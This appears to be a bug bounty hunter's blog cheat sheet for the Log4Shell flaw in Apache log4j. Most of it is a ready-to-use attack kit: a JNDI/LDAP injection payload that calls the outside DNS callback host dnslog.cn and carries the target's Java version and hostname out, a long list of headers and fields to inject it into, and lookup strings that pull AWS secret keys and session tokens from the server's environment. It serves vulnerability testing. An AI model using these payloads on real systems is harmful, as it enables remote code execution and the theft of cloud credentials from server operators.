Description
Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228
Affected versions - Apache log4j 2.0-beta9 ≤ 2.14.1
How It Works
Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters
https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
You can use a service
dnslog.cn
to create your DNS subdomain for a test. Example:qwe3er.dnslog.cn
Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of successful callback
You should receive a similar request to DNS service (with Host & Java Version):
jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn
Test Environments
You can use provided test environments to inspect the behavior of this vulnerability
Challenges & Labs (Rooms)
You can use created challenges, labs (rooms) for practice
How To Identify (Services)
Use these websites to create DNS address (token) for payload
- https://canarytokens.org (Token Type: Log4Shell)
- https://app.interactsh.com
- https://dnslog.cn
How To Identify (Scanners)
Use these scanners to check if target website is vulnerable
List of Places where Payload can be Injected
Email header, Username, Password, E-mail address, Filename, Query/Body, File content, Document/Image EXIF, or inside of any of these Headers:
Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
What Information can be Extracted
${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
Video Edition is available on
- YouTube #shorts - https://youtu.be/vPG4IX9xIkU
- Instagram - https://t.co/27uFm5f9Va
- TikTok - https://t.co/kW15YiLKHq
Static Version Shared On
- LinkedIn - https://t.co/bS7JndJ1yG
- Instagram - https://t.co/I6ivWbVDMp
- Twitter - https://lnkd.in/gr2tfgcx
That's all for now
- Share the word about this article
- Follow me @therceman
I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍
Top comments (0)